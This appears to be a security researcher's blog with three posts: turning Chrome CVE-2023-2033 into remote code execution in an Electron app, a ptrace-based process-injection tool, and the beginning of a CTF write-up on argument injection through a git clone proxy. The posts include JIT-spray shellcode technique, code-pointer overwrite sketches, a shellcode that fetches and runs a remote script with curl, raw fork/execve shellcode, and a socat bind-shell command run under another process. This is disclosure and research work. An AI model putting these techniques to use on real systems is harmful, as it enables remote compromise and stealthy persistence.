Turb0
Bits, bytes, and bad ideas

Weaponizing Chrome CVE-2023-2033 for RCE in Electron: Some Assembly Required

Tue Mar 12 21:30:17 UTC 2024

Background

I discovered a React createElement based XSS bug in the core functionality of an application with a bug bounty program that also had a desktop application. I'd found a couple of these types of bugs in this application before, and knew roughly what the expected payout would be. I wanted to turn the XSS vulnerability into remote code execution on the hosts of the desktop application's users. The desktop application was running a version of Electron that used a Chrome version from roughly March 2023 and had Chrome sandboxing disabled in the main renderer window. I needed an RCE PoC to show impact. This is the story of how I got there. Heavy disclaimer: I had no prior browser exploitation experience before this, and the process was a learning experience for me. There may be minor, and even major, nuances I misunderstood or got wrong here, so take everything with this in mind.

Weaponized RCE PoCs for Chrome vulnerabilities less than a year old are not readily available online. Some of the type confusion bugs from the last year do have PoCs that go as far as implementing v8 heap read/write/addrof primitives. These public PoCs all seem to be built against d8, v8's developer shell. In practice, some of these weren't going to work on the targeted Chrome version, at least not without extensive modifications, because v8 runs with very different flags under Chrome than in a local d8 test run and behaves very differently as a result.

The target: Chrome/110.0.5481.192 Electron/23.2.0 on x86_64 Linux. For the purposes of this writeup, a very minimal Electron application was built using electron-forge to package a production build that ran an unsandboxed main renderer window and navigated to a local webserver that hosted a site with the exploit code.

CVE-2023-2033 ended up being the vulnerability that was chosen. A public PoC was readily available online with v8 heap read/write/addrof primitives that, after some tinkering, seemed to work reliably on the targeted Electron version. The following writeup is on weaponizing these primitives to achieve mostly stable and reliable RCE on amd64 Linux. The nature of how these primitives are implemented with the type confusion vulnerability is beyond the scope of this blog and can essentially be treated as a black box, thanks to the wonderful work done in mistymntncop's PoC that implements them.

Exploit development was done locally against a running production Electron application, attaching GDB to the renderer process that ran the exploit code. A local d8 debug version was compiled and used for some small tests to better understand how JS objects are laid out in v8 memory, as well as how TurboFan compiled JIT code was intended to look, but it was not used for exploit development or testing, as it behaved differently than the production Electron application.

Getting the v8 heap primitives working

Mistymntncop's PoC was used as the starting place for this exploit. To use this as a base, it was required to get the v8 heap primitives implemented here working on the targeted version of Chrome.

First, all of the d8 native syntax needed to be removed from the PoC exploit primitives this exploit was built on, since the target was a production Chrome instance and not a debug d8 instance, where that syntax throws syntax errors. In this case, this just meant commenting out all of the %DebugPrint lines. It was also necessary to bulk replace calls to print() with calls to console.log(), as on Chrome, print() attempts to open a printing prompt instead of logging text.

Getting the v8 heap read/write/addrof primitives from mistymntncop's PoC code to work on the target Chrome version was a little tricky. It was written and tested against a specific version of d8, and not written for Chrome. At first when an HTML document that included the exploit.js script was loaded, it was observed that the exploit failed to set up the primitives, and a JavaScript error appeared in the console.

Primitive errors

Following the old OffSec mantra of "Try Harder", the primitives could be installed properly by simply running the pwn() function that sets everything up four times. On the fourth run, instead of throwing an error, it usually set the primitives up successfully, and their usage in the stock PoC example was observed to be working.

Working primitives

Code was added to the exploit that made a new pwn() call after timeouts of 0, 100, 200, and 300 milliseconds to attempt to install these primitives correctly.
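
In sketch form, assuming the pwn() function from the modified PoC, this retry logic is as simple as:

  // Attempt primitive setup several times; in practice the fourth call usually
  // succeeded where the earlier ones threw.
  setTimeout(pwn, 0);
  setTimeout(pwn, 100);
  setTimeout(pwn, 200);
  setTimeout(pwn, 300);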

V8 heap sandbox breakout theory

Having read/write/addrof primitives for the v8 heap was useful, but did not provide code execution for free. After reviewing a couple of different writeups that dealt with this problem, it seemed the best bet was to force TurboFan (v8's top level JIT compiler) to optimize a function with Float64 Typed Array data in it, such that movabs instructions with 8 byte immediate arguments were generated for each long float in the array. Each of these 8 byte immediates contained 6 bytes of shellcode and a 2 byte jmp instruction jumping into the immediate value of the next movabs instruction. The v8 heap read/write/addrof primitives could then be used to tinker with the code addresses of functions to try to somehow get the instruction pointer to jump into the shellcode chunks.

The first writeup, Mem2019's, included a function with shellcode to make an execve syscall executing /bin/sh. This function and an additional one were added right before the pwn() calls.

Functions added

The foo function was called several times to cause TurboFan to compile and optimize the function, which was necessary to generate the movabs instructions with long 8 byte immediate arguments.
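
In outline, the setup looks something like the following sketch (the screenshot above shows the actual functions used); the iteration count here is arbitrary, and the float constants stand in for the real encoded shellcode:

  // foo() returns an array of doubles whose 8-byte bit patterns are the shellcode chunks.
  function foo() {
    return [/* Float64 constants encoding 6 bytes of shellcode + a 2 byte jmp each */];
  }

  // Call it in a hot loop so TurboFan JIT compiles and optimizes it, baking each
  // constant into a movabs reg, imm64 instruction.
  for (let i = 0; i < 100000; i++) {
    foo();
  }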

The shellcode that was assembled and encoded into Float64s was lifted from Mem2019's blog. This shellcode was generated with this Python script, also lifted from Mem2019.

Shellcode maker base
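
Each 8 byte value then needs to be reinterpreted as the Float64 with the same bit pattern before it can be placed in a JavaScript array. A minimal helper for that conversion might look like this (an illustrative sketch; a separate conversion tool was used in practice):

  // Reinterpret a 64-bit integer (given as a BigInt) as the IEEE-754 double with the same bits.
  function qwordToFloat(qword) {
    const buf = new ArrayBuffer(8);
    new BigUint64Array(buf)[0] = qword;
    return new Float64Array(buf)[0];
  }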

With the 8 byte hex values converted to Float64s, the foo() function that returned them in an array was executed under GDB with d8, and the TurboFan compiled, optimized assembly code for the foo() function was inspected.

TurboFan generated asm

As expected, the TurboFan compiled and optimized foo() function contained a series of movabs instructions whose long 8 byte immediate values held the shellcode.

Playing with the primitives

Based on the research from Mem2019's writeup, the addrof primitive was used on both the foo() and f() functions to get a v8 heap pointer to the backing object. The read primitive was then used to read the JIT code address of the function 0x17 bytes from the start of the object pointer. To test this, code was added to the end of the pwn function that attempted to get the address of both the foo() and f() functions, and to read 8 bytes of memory 0x17 bytes after the start of each address.
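
Using placeholder names for the PoC's helpers (addrof, read64) and assuming they operate on BigInt addresses, the added test code amounted to something like:

  // Hypothetical helper names; the modified PoC's own primitives were used in practice.
  const fAddr   = addrof(f);
  const fooAddr = addrof(foo);
  const fJitAddr   = read64(fAddr + 0x17n);    // candidate JIT code address field
  const fooJitAddr = read64(fooAddr + 0x17n);
  console.log(fJitAddr.toString(16), fooJitAddr.toString(16));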

F and foo addresses

The primitives appeared to be working: it was possible to get the addresses of function objects and read memory at an offset from them. If these were actually the pointers that determine what code runs when a function executes, then overwriting function f()'s JIT address with function foo()'s via a write call should make a call to f() produce the result of calling foo() instead. The following code was added to the pwn() function:

F and foo swap
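
In sketch form, using the same placeholder helper names as above (the screenshot shows the actual code), the swap boils down to:

  // Make f() behave like foo() by copying foo()'s JIT code address field over f()'s.
  write64(addrof(f) + 0x17n, read64(addrof(foo) + 0x17n));
  f();   // now expected to run foo()'s compiled code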

When this actually ran, and the primitives installed correctly, it was observed that the behavior of function f() was successfully changed to act as if it was function foo().

F and foo swap run

Seeking instruction pointer control

Mem2019's writeup suggested that by writing to this jitAddr offset from a function object and calling the function, the lower 32 bits of the instruction pointer could be controlled. To see what happened when this was attempted, instead of writing the jitAddr of function foo() to function f(), the value 0x4142434445464748 was written. The automatic calls to pwn() were removed, and it was manually called from Chrome DevTools after GDB was attached to the renderer process. If the instruction pointer could be controlled this way, it was expected to observe a segmentation fault with the lowest 32 bits of the instruction pointer matching the lowest 32 bits of the garbage test address.

Test crash

The crash that occurred was inspected, and it was observed that this was not actually the case. The crash occurred when attempting to read memory from $rcx+0x7, and the low 32 bits of $rcx matched the low 32 bits of the written jitAddr. After this read into $rcx, a jmp occurred that set the instruction pointer to $rcx. A couple of instructions back, the familiar 0x17 offset from the value stored in $rdi being read into the low 32 bits of $rcx was visible. Presumably, $rdi stored a pointer to the function object, and the value read into the low bits of $rcx was the jitAddr. $r14 was then added to $rcx, presumably some offset that maps v8 heap addresses to native heap addresses. If what was read from $rcx+0x7 into $rcx before the jump could be controlled, the instruction pointer could be controlled. To try to understand what normally resided there, another renderer crash was caught in GDB, this time writing fooJitAddr | 0xF0000000 instead of the fixed value, with the high bits set in the hope of seeing another segmentation fault when attempting to read memory from $rcx+0x7. Based on previously read addresses, it was expected that these bits were normally 0.

Finding code addr

When this crash was captured, the segfault occurred in the same spot on the same memory read attempt. This time, however, it was possible to recover the intended original value of the foo function's JIT address by reading the low 32 bits stored at $rdi+0x17 and ANDing them with ~0xF0000000. This gave back the original intended address. $r14 was added to it, and the memory at 0x7 past that sum was read to get the value that, without this tampering, would have been read into $rcx before jumping to it. GDB was used to inspect the instructions at this address.

Function code instructions

Observing the instructions that would have been jumped to, the intended movabs instructions with 8 byte immediate values were present. Because of this, it was inferred that this was the TurboFan generated JIT compiled code for the foo() function. GDB was used to inspect the first 3 instructions parsed starting 2 bytes into the first movabs instruction, and the first part of the shellcode was visible. Subtracting the intended start of the function from the entry point of the shellcode, it was calculated that if the function had been jumped into 0x7c bytes further than intended, the shellcode would have begun executing instead of the intended TurboFan generated code.

Seeing shellcode

Gaining instruction pointer control

Based on the previous testing, it was expected that a read of fooJitAddr+0x7 would return the pointer to the compiled TurboFan generated code. Upon actually testing this, it was observed that the address was quite similar to the one in the last test. This address was a native heap address, not a v8 heap address, so the primitives could not be used to read and write shellcode at the location on the heap that was going to be jumped to. However, the address could be read, 0x7c could be added to it, and it could be overwritten with this sum. The overwritten value would then get loaded into $rcx by the instruction that was previously segfaulted on, immediately before the jmp $rcx instruction, which would jump into executing the 8 byte immediate value of the first movabs instruction generated by TurboFan for the foo function built from the Float64s containing the shellcode.

The pwn function was modified to do this, and it looked like the following:

Foo code ptr overwrite
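
Roughly, using the same placeholder helper names as earlier (fooJitAddr being the value read from addrof(foo) + 0x17), the added logic is:

  // fooJitAddr + 0x7 holds the native pointer to foo()'s TurboFan compiled code.
  const codePtr = read64(fooJitAddr + 0x7n);
  // Point it 0x7c bytes further in, at the first movabs immediate holding shellcode.
  write64(fooJitAddr + 0x7n, codePtr + 0x7cn);
  foo();   // the call now lands directly in the shellcode chunks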

When this was executed successfully in the vulnerable Electron version, the call to function foo() after the write led to the TurboFan compiled code being jumped into 0x7c bytes further than intended, where the 8 byte chunks of shellcode started. The shellcode ran successfully, and execve with /bin/sh was called, leading to the following in Electron.

/bin/sh run

The renderer process was gone, as it had replaced itself with /bin/sh and exited. In the GDB session attached to the renderer before running the exploit, it was observed that /bin/sh was successfully executed. On the system used to write the exploit it happened to be a symlink to /usr/bin/dash.

gdb /bin/sh run

This was far enough to prove remote code execution was possible. However, it wasn't a useful proof of concept payload, since an attacker has no way to interact with the stdio of a running Chrome renderer process. It was desirable to write more useful shellcode that called /bin/sh with arguments that actually did something impactful.

Writing more useful shellcode

It was necessary to write more useful shellcode that showed the ability to execute arbitrary scripts pulled from a remote server. To do this, shellcode was written that ran /bin/sh '$(/bin/curl www.turb0.one/files/s)'. The following shellcode was written that could reasonably do this, with every instruction encoding to 6 bytes or less, so that each could fit in an 8 byte movabs immediate and leave 2 bytes of room for the jmp at the end into the next 8 byte immediate value.

naiveshellcode

An int3 instruction was included at the beginning so that GDB would break on the shellcode start and the generation of the movabs instructions with 8 byte immediate values by TurboFan could be verified. These 8 byte hexadecimal numbers containing the shellcode were run through this likely overprecise online tool to convert the shellcode chunks to Float64 values for use in the foo() function. The foo() function now looked like the following:

naiveshellcode foo

Due to the change in the number of entries in the array, the TurboFan compiled code actually looked a bit different, and the offset from the address of the compiled function that was jumped into had to be changed. The same trick from earlier of segfaulting with known addresses was used, and the offset was found to be 0x82. The previous pwn() function was updated to use this offset instead of 0x7c. With this change, the exploit was run with GDB attached to the renderer process, and the int3 breakpoint was hit.

naiveshellcode fail

The shellcode was reached, and execution was occurring within it. However, when execution was continued, a segfault occurred in the shellcode instead of /bin/sh being executed.

Troubleshooting longer shellcode

When attempting to work out where and why the segfault occurred, it was clear what had gone wrong with the shellcode. Some instructions before the instruction pointer were listed, and it was observed that the expected movabs instructions with 8 byte immediate values spaced 0x14 bytes apart were not always present.

Shellcode broken assumptions

It appeared that TurboFan had generated code for the foo() function that optimized the loading of some of the repeated values in the Float64 array the shellcode lived in. This should have been expected, as TurboFan is v8's top level JIT compiler and is meant to generate the most optimized JIT code. This meant that if longer shellcode payloads were to be written by this method, it would be necessary to make sure the shellcode didn't repeat itself, so that TurboFan wouldn't be able to perform these optimizations instead of generating the desired movabs instructions with 8 byte immediate values.

Writing an anti optimizing shellcode generator

It was necessary to modify the shellcode generating python script to write "anti optimization" shellcode so that TurboFan couldn't optimize out any of the desired movabs instructions that contained the shellcode. In its original state, when an encoded instruction didn't fill the entire 6 bytes of space before the jmp instruction into the next piece of shellcode, the extra bytes in between were filled with nop instructions. This meant that the same Float64 would be generated for the same <= 6 byte chunk of shellcode, which allowed the TurboFan optimization behavior that needed to be avoided. Instead, these instructions could be encoded so that the jmp came immediately after the instruction, with the jmp distance adjusted to reflect that it no longer sat at the end of the chunk, and the rest of the 8 bytes could be filled with procedurally generated junk bytes that, unlike the nops, never get executed and just get jumped past. This prevents two identical chunks of shellcode shorter than 6 bytes from producing the same Float64 value. The only repeating chunks in the longer shellcode that had been written all had room for these additional garbage anti optimization bytes. The shellcode generator script was modified to implement this, and ended up with functionality that looked like the following:

Better shellcode generator

The script was rerun, and the output was run through a Float64 converter to get the floats that replaced the contents of the array foo() returned. After attaching GDB and rerunning the exploit with this new payload, the int3 breakpoint was hit again. Upon continuing, instead of the exploit running successfully and /bin/sh executing with the desired arguments, the program segfaulted again. Inspecting the instructions leading up to the instruction pointer, it was clear that the crash had occurred in the shellcode section and that the instructions appeared correct, meaning the optimizing behavior of TurboFan had been successfully mitigated. The instructions were the same, but the distance between the movabs instructions had changed.

Gap size change

The size of the movsd instruction was observed to have changed because it needed to take a larger argument. The generated instructions were reviewed, and it was determined that the assumption of a 0x14 byte gap between movabs instructions only held for the first 15 of them. After that, due to the larger encodings needed for the instructions between the movabs instructions, the gap became 0x17. The segfault occurred because the shellcode didn't jump far enough from the last instruction, and should have instead jumped 3 bytes further. A counter was added to the shellcode generator to account for this in the jmp instructions into the next chunk of shellcode, and the python looked like the following:

Final shellcode generator
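
The actual generator is the Python script shown above. The core packing step it implements can be sketched like this, assuming each instruction encodes to at most 6 bytes, the jmp rel8 is 2 bytes, and gapFor(i) returns the observed distance between consecutive movabs instructions (0x14 for the first 15, 0x17 afterwards in this particular build):

  // Pack each instruction into an 8-byte chunk: [instruction][jmp rel8][junk padding].
  // The junk bytes are never executed (the jmp skips over them), but they keep every
  // 8-byte constant unique so TurboFan cannot collapse repeated values.
  function packChunks(chunks, gapFor) {
    return chunks.map((ins, i) => {
      const out = new Uint8Array(8);
      out.set(ins, 0);
      const last = i === chunks.length - 1;
      if (!last) {
        out[ins.length] = 0xeb;                            // jmp rel8
        out[ins.length + 1] = gapFor(i) - ins.length - 2;  // distance to the next chunk's first byte
      }
      for (let j = ins.length + (last ? 0 : 2); j < 8; j++) {
        out[j] = last ? 0x90 : 1 + Math.floor(Math.random() * 255);  // nops only on the final chunk
      }
      return out;
    });
  }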

Achieving stager shellcode execution

The int3 at the start of the shellcode was removed, and a final payload was regenerated and reencoded with the new and improved generator, which now produced anti optimization code to ensure TurboFan always generated a movabs instruction for each chunk of shellcode and supported the longer jumps between movabs immediate values later in the TurboFan compiled code. The staged payload at www.turb0.one/files/s just had the content /bin/touch /tmp/rcepoc. The exploit was rerun with the final payload. Chrome DevTools reported that the renderer process was gone, suggesting the shellcode had reached the execve syscall successfully. Running ls /tmp showed that a /tmp/rcepoc file had been created, confirming the shellcode had run successfully.

RCE PoC file written

This showed that the second stage script had successfully been pulled from the web server and executed. A working exploit had been created that practically performed remote code execution in the target Electron version by leveraging the v8 heap primitives written for CVE-2023-2033 by mistymntncop, with techniques inspired by and adapted from Mem2019's research.

Wrapping things up and fully weaponizing

The calls to pwn() that automatically attempt to run the exploit when the page loads were uncommented. The primitives didn't set up properly every time, and sometimes they crashed instead of working; the failure rate on the test machine felt like about 10%. To mitigate this, a file, exploitloader.html, was created that iframed 5 instances of exploit.html, which loaded the actual exploit.js containing the exploit code. This was designed to lead to more consistent execution of the RCE PoC payload.

Final versions of files mentioned in this writeup can be found here:

Conclusion

This writeup covers parts of the research process I went through to weaponize CVE-2023-2033 for RCE with a lot of long dead ends cut out. Some conclusions in this writeup were drawn more quickly and understandings reached more directly than they occurred in practice. I went into this with no past browser exploitation experience or knowledge, and left with some functional understanding of some browser exploitation related topics. I was able to get a working full chain PoC put together and a report in for the application I was targeting, and the report was remediated. In the process, I was able to learn tricks for going from v8 primitives to shellcode execution, work out how to get instruction pointer control on the version of Chrome I had to target, and build a script to create anti TurboFan optimization shellcode.


Burster Shell: Spawn Children of Arbitrary Processes

Wed Oct 18 5:42:26 PM EDT 2023

I was testing some of the endpoint protection capabilities of a couple of COTS container security products and wanted to see how well they detected unusual interprocess memory interactions and process injection attack behaviors in Linux containers. I decided to write a pair of short and simple programs: one without PIE enabled that just sleeps and prints a number every 20 seconds, and another that ptrace attaches to a target pid and sets a word of data at a fixed address before detaching. If the second program made this change to the memory of a process instance of the first, it would modify the executable code that moves the number into the register used for printing, so that a different number would be printed. This triggered no specific detections, which seemed somewhat reasonable, as such a minor ptrace interaction would probably be indistinguishable from intended debugger interactions.

I reflected for a bit on what blatantly malicious ptrace usage would look like. An argument could be made that any ptrace call occurring in a production privileged Linux container is likely malicious, as there shouldn't be any use case for it, especially not debugging. After thinking about what was theoretically possible based on my relatively intermediate understanding of Linux process internals, I settled on writing a tool for spawning arbitrary new processes as children of arbitrary other processes. I would implement this with ptrace by overwriting and then reverting some shellcode and registers.

It is worth noting that this post uses a lot of terms and concepts without explaining them, and expects a basic understanding of Linux process internals and terms surrounding them.

Implementation Plan

To do this in practice, my plan was to build a tool that, after ptrace attaching, writes a custom payload at the target process's instruction pointer containing the arguments for execve along with the actual shellcode to make the fork and execve syscalls. After execution was resumed and the fork and execve occurred, the shellcode would raise a signal from the target process, prompting the tool to write the original memory and registers back to the target process and ptrace detach.

To do this, the following steps would occur.

  1. ptrace attach to the target process
  2. wait for it to stop
  3. ptrace read registers
  4. store this original register state
  5. build full payload of data to write to target process memory
  6. read payload length number of words of memory from the target process, starting at the instruction pointer
  7. ptrace write the generated payload at the instruction pointer
  8. ptrace set the registers to prepare for the shellcode execution, and move the instruction pointer forward into where the shellcode part of the payload actually starts
  9. ptrace continue target process execution
  10. catch the SIGTRAP raised by the target process once it reaches the end of its shellcode
  11. write back old words of memory to the target process
  12. reset the registers of the target process to their original state
  13. ptrace detach
  14. the target process should be back in its original state but now have a forked child process

Implementation Details

In actually implementing this, there were some steps that in practice had additional details. I wrote this tool in C, and am calling it the burster shell, as the concept of spawning a child from an unaware process can be likened to alien chestbursters. The source code can be viewed here.

Initially during development, instead of shellcode that forked and then executed, I had shellcode that just executed, replacing the target process image entirely and requiring no cleanup. This seems like useful functionality, but it was not the intended goal of this tool, and is something I may want to come back to.

Referencing the source, in the final implementation, the shellcode looks like the following.

  // syscall | cmp rax, 0 | jne +9 | mov rax, 0x3b | syscall | int3
  const char shellcode[] = "\x0f\x05\x48\x83\xf8\x00\x75\x09\x48\xc7\xc0\x3b\x00\x00\x00\x0f\x05\xcc";

Assembled, the shellcode looks like this.

shellcode instructions

This shellcode makes a lot of assumptions about the state of the registers before it is run. It makes a syscall, assuming that the registers are already set up for a fork syscall, then compares the returned pid in rax, jumping to the instruction that raises a SIGTRAP in the case of the parent. In the case of the child, this jump doesn't occur, and rax is set to the syscall number of execve. Another syscall instruction is run, assuming rdi contains a pointer to the filename at the start of the payload written to the process memory, and rsi contains a pointer to the future child's *argv[] pointer array written in the payload before the shellcode. It is also assumed that rdx (*envp[]) is set to 0. This leads to the child process making a successful execve call and replacing its image entirely, ending its execution of the shellcode.

The full payload with the char* strings of argv, and the char** pointers to the strings of argv looks like the following.

//[filename][argv0][argv1][&argv0][&argv1][null ptr to terminate argv][nop buffer][shellcode]

In a case where /usr/bin/sleep 20 is intended to be executed as a child of a target process, the payload may look like the following.

full payload

In this example, argc is 2, but an arbitrary argc is supported. The filename is a null terminated string used for the execve syscall. The argv0 and argv1 values are also null terminated strings containing the arguments of the child process to create. &argv0 and &argv1 point to the instruction pointer this payload is written at, plus the offset of argv0 and argv1 from the start of the payload, respectively. A null ptr comes after these to terminate *argv[]. 8 nops are included after the "data" section of the payload so that, given the arbitrary length of x86_64 instructions, the data bytes cannot glob together with the executable shellcode and form invalid or unintended instructions. The shellcode is then written, and its start is the address the target process instruction pointer will be set to before continuing the target process.
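
The byte level assembly of that payload can be sketched as follows. This is an illustrative JavaScript sketch of the layout rather than the tool's C implementation, assuming base is the address (as a BigInt) the payload will be written to, i.e. the target's instruction pointer at attach time:

  function buildPayload(base, argv, shellcode) {
    const NOPS = 8;
    const filename = Buffer.from(argv[0] + '\0');              // [filename]
    const argStrings = argv.map(a => Buffer.from(a + '\0'));   // [argv0][argv1]...

    // Offset of each argv string within the payload, starting after the filename.
    const offsets = [];
    let off = filename.length;
    for (const s of argStrings) { offsets.push(off); off += s.length; }

    // Pointer table: one 8-byte little-endian pointer per argv string, then a NULL terminator.
    const ptrTable = Buffer.alloc(8 * (argv.length + 1));
    offsets.forEach((o, i) => ptrTable.writeBigUInt64LE(base + BigInt(o), i * 8));

    const nops = Buffer.alloc(NOPS, 0x90);                     // [nop buffer]
    return {
      payload: Buffer.concat([filename, ...argStrings, ptrTable, nops, shellcode]),
      filenamePtr: base,                                        // execve pathname (rdi)
      argvPtr: base + BigInt(off),                              // *argv[] pointer array (rsi)
      newRip: base + BigInt(off + ptrTable.length + NOPS),      // where the shellcode starts
    };
  }

Calling buildPayload with base set to the captured rip and argv of ['/usr/bin/sleep', '20'] would produce the same general layout as the example above.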

Usage Demonstration

The interface for this tool is flavored as a shell. By default, it will target its own child process that it creates at launch, but the target process can be changed with a setpid [pid] shell builtin command. Instead of spawning children of its own like a traditional shell, it ptrace attaches to the target process and uses the previously described mechanisms to spawn children of the target process.

For this example demonstration, the goal will be to spawn a socat bind shell as a child of the already running dhclient process. First, we will run pstree to get the currently running process hierarchy tree, and then run pidof to get the pid of our target process.

finding target pid

We can see that the dhclient process has two children, another dhclient process, and sleep. We can also see that the pid of the dhclient process we want to target is 399. We can now run the burster shell and use the shell builtin to set the target pid to 399. Now, any commands executed will be spawned as children of the target process, dhclient, via the previously described mechanisms. We now can run /usr/bin/socat -d -d TCP4-LISTEN:1337 EXEC:/bin/bash to start a socat bind shell as a child of the dhclient process.

using burster shell to start bind shell

We see that it appears to have executed successfully, and we can exit the burster shell. We can now attempt to connect to the bind shell and execute commands. We see that we can do this successfully, and running pstree, we see that the dhclient process now has a child process of socat, which in turn has its own bash child process that is our active bind shell.

using bind shell

Our bind shell will continue to run as a child of dhclient until the parent dies, it is killed, or the system is rebooted. We have successfully spawned a child process of an arbitrary process.

Implementation Limitations

This implementation is very naive and has a lot of flaws. Here are some of the ones that have been identified.

Leaking Zombie Processes

When children of the target processes exit, they are not cleaned up by the parent, which leads to all children being leaked as zombie processes. This is unfortunate, and without injecting long term code into the target process, I am unaware of a way to handle this.
This is why there is a sleep child of the dhclient process in the demonstration section. It was a zombie created by a previous test, and I have no way to clean it up.

No *envp[] Passed to Children

The execve syscall is deliberately made with a null *envp[] pointer. It is difficult to say what *envp[] should even be. Should a copy of the burster shell's *envp[] be copied into the payload, like the target *argv[] is? Should some introspection of stack frames be done by the burster shell to find the target process's *envp[] address and use that? In either case, additional code would have to be written, and new problems would crop up in the details.

Fixed Length Buffers

As a C program, this shell sucks. There are blind memcpy(3) calls that can easily overflow the fixed length buffers on the stack. The arrays that some of the target process data gets read into are also fixed length. One can observe here bad practices and bad code, but ultimately this is meant to be a fast and useful proof of concept tool.

Burster Shell Lacks Features

As a shell, this shell sucks. I'd like readline or similar support, some ways to control certain *envp[] values passed to children, more shell builtins, piping (this could be a nightmare), a way to escape spaces and wrap things in quotes, and just generally more niceties expected of a usable shell.

No Cross Platform Support

This code is aggressively non portable. The shellcode assumes x86_64. The syscall ABI assumes Linux calling conventions. A long is assumed to be the same size as a pointer, which is assumed to be 8 bytes.

No Guarantee That Payload is Written to Executable Memory

The burster shell process assumes that there is enough executable memory after the instruction pointer at the time of attaching to a target process to hold the entire payload. This could be done safely by capping the payload at less than 4096 bytes, the typical page size on a Linux system, and writing it at the start of the page containing the instruction pointer (calculated from page address alignment rules) instead of at the instruction pointer itself.
In the case where this assumption fails, the target process will segfault when running the shellcode. In practice, I have yet to see this occur.

Conclusion

This project started as an unnecessarily deep dive into evaluating COTS container security runtime products, and led me to a better understanding of Linux processes and ptrace, as well as a usable proof of concept process injecting shell. I am avoiding including any details, drawing any conclusions, or dropping any vendor names here around how the container security capabilities detected the process injection behaviors of this tool on Linux containers with the ptrace capability. In short, I was not impressed.

In the future, I may use this tool for interesting post exploitation trickery, and generally break it out as a cool party trick in occasions that call for it. I was able to confirm a lot of my understanding of Linux process internals by actually implementing my idea, and am surprised that it ended up working the way I thought it would.


Discovering RCE in Repository Onboarding Code

Sun Jun 11 01:46:52 PM EDT 2023

In the afternoon of a day a couple of weeks ago, I was looking at a company's internal platform used by developers for repository onboarding, amongst other things, that ran a lot of custom code. I was drawn to a loose thread that, upon picking at it, kept unraveling, ultimately resulting in the development of a stable RCE exploit. This testing was performed with permission, sanctioned by the company's AppSec program, and with access to the custom parts of the application's .net source code. For obvious privacy and security reasons, I cannot publish a writeup about the discovery of the vulnerability and the development of the exploit for this system. Although it has since been patched, I do not want to disclose anything about the nature of the application or the company. Instead, here's a writeup about a CTF challenge I wrote on an evening of a day a couple of weeks ago.

Initial Interactions

Upon looking at our target, we see the following page that displays an input for text to convert, an output for converted text, a submission button, and a couple of links to backend source code.

challenge view

If we enter a test input and actually submit the form with the Chrome devtools network tab open and recording, we see the following request in the below image.

challenge request

Looking at the request headers, the request URL, and the response headers, we can learn a few things. Firstly, we see that the request is made to /api/function_proxy and provided another URL as a query string parameter. This second URL refers to a "backend" hostname and a /convert route, with our input text set as the text query string parameter. This suggests that the API endpoint we are hitting is making a request to the URL it is provided, in this case http://backend:8080/convert?text=test, and handing us back the response. It suggests that the API has some custom DNS entries that allow it to resolve backend to a valid IP when making the request, and that we cannot hit whatever the backend service is directly.

Additionally, we see an Authorization header being set for the request with a uuid looking value. We also see in the response headers that the remote server is an nginx server, but the X-Powered-By header says Express, suggesting that we are communicating with an Express server reverse proxied behind an nginx server.

If we look at the response body and the output box, we see the value dGVzdA==, which looks like a base64 string. Upon decoding it, we get the value test, our input. This behavior doesn't really give us too much to look into, but the ability to pass the /api/function_proxy endpoint a URL parameter seems interesting, so let's see what the application source looks like and what we may be able to do with this.

Source Review

Following the links on the page to the two sources we get this and this file.

The first file appears to be a self contained Node.js Express web server application. It supports two routes, the first being one that exposes the source file we are reading, and the other being the /function_proxy route we saw the frontend talking to when we submitted the form. If we look at the logic implemented by the code that handles the /function_proxy route, we can see that the following flow runs.

  1. Check that an Authorization header is set, if it isn't, return a 401 unauthorized response unless the url query parameter is set to http://backend:8080/index.js
  2. Check if a url query parameter is specified, and check if it begins with http://backend:8080/. If either of these checks fail, return a 403 forbidden response.
  3. Use the axios library to make a GET request to the url specified in the url query parameter and include an Authorization header with the backend key loaded from an environment variable at runtime. If this request errors, return a 500 response with the error message.
  4. If it exists, return the result of the request from the last step.
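
Condensed into code, that flow looks roughly like the following sketch. This is a reconstruction from the described behavior rather than the challenge's verbatim source, and BACKEND_KEY is a stand-in for whatever environment variable name is actually used:

  const express = require('express');
  const axios = require('axios');
  const app = express();

  app.get('/function_proxy', async (req, res) => {
    const { url } = req.query;
    if (!req.headers.authorization && url !== 'http://backend:8080/index.js')
      return res.status(401).send('Unauthorized');
    if (!url || !url.startsWith('http://backend:8080/'))
      return res.status(403).send('Forbidden');
    try {
      // Proxy the request to the backend, attaching the secret key it expects.
      const backendRes = await axios.get(url, { headers: { Authorization: process.env.BACKEND_KEY } });
      return res.send(backendRes.data);
    } catch (err) {
      return res.status(500).send(err.message);
    }
  });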

This tells us that an Authorization header is required, but the value isn't ever checked. It also tells us that unless we can devise a way for a URL to begin with http://backend:8080/ and be interpreted to resolve to something else, we may not be able to perform any server side request forgery attacks. It does seem that we can try other URLs beginning with http://backend:8080/ and have a proxied request to the backend be made on our behalf, but we are not yet sure of what other routes may be implemented on the backend.

If we look at the second file, we can see what appears to be another self contained Node.js Express web server application. This one seems more complicated, and has a piece of middleware that validates that all requests have an authorization header set that matches a key loaded from an environment variable at runtime, rejecting requests that fail this check with a 401 unauthorized response. We see three routes implemented, one for exposing this source code file, one for handling the /convert logic we saw referenced in our request from submitting the form that takes a text parameter and base64 encodes it, and a third, /repo_has_conf.

The logic for handling the /repo_has_conf route works as follows:

  1. Check that a repoName query parameter is set, if not, return a 400 bad response.
  2. Check if an instanceId query parameter is set, if not, generate a random UUID and use it as the instanceId.
  3. Build a repoUrl from https://github.com/ with the value of repoName concatenated
  4. Check if a local path exists on disk where the path is built from ./repos/ with the instanceId value concatenated to it
  5. If this path doesn't exist, call a parseArgs() function with the value resulting from clone "${repoUrl}" "${instanceId}" and store the result as args
    • Call execFileSync() with the string literal git passed as the file, and the args built from the previous step as the arguments, in the working directory of ./repos
    • If this command fails, abort as if the config file was not found
  6. Check if a config.json file exists in the './repos/' + instanceId + '/config.json' path and return whether or not it does.
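
Again as a rough reconstruction (helper names, the response shape, and the exact paths are assumptions based on the description above), the handler looks something like:

  const fs = require('fs');
  const { execFileSync } = require('child_process');
  const { randomUUID } = require('crypto');

  app.get('/repo_has_conf', (req, res) => {
    const { repoName } = req.query;
    if (!repoName) return res.status(400).send('Bad request');
    const instanceId = req.query.instanceId || randomUUID();
    const repoUrl = 'https://github.com/' + repoName;

    if (!fs.existsSync('./repos/' + instanceId)) {
      try {
        // User input flows into the argument string handed to parseArgs().
        const args = parseArgs(`clone "${repoUrl}" "${instanceId}"`);
        execFileSync('git', args, { cwd: './repos' });
      } catch (err) {
        return res.json(false);   // clone failed, treat as no config found
      }
    }
    return res.json(fs.existsSync('./repos/' + instanceId + '/config.json'));
  });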

